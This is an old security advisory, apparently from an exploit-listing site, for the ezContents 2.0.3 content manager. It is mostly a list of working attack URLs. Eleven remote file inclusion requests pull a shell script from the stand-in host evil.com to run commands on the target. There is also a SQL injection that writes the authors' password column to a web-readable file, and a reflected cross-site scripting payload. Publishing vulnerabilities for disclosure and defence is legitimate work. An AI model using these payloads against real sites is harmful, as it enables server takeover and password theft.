ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS

2006.09.02
Credit: DarkFig
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

# # VulnScr: ezContents Version 2.0.3 # Web....: http://www.ezcontents.org/ # # Date...: Web July 28 10:44 2006 # Credits: DarkFig (gmdarkfig (at) gmail (dot) com [email concealed]) # Vuln...: SQL Injection, Remote/Local File Inclusion, Cross Site Scripting # ==[ Remote / Local File Inclusion ================================= http://[...]/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin _home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[lang uage_home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBAL S[admin_home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBAL S[admin_home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_ home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language _home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language _home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS [admin_home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language _home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[lang uage_home]=ftps://evil.com/sh.php&cmd=ls http://[...]/modules/whatsnew/whatsnew.php?GLOBALS[rootdp]=&GLOBALS[lang uage_home]=ftps://evil.com/sh.php&cmd=ls ==[ SQL Injection ================= http://[...]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' # ==[ Cross Site Scripting ======================== http://[...]/loginreq2.php?subgroupname="><script>alert(666)</script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top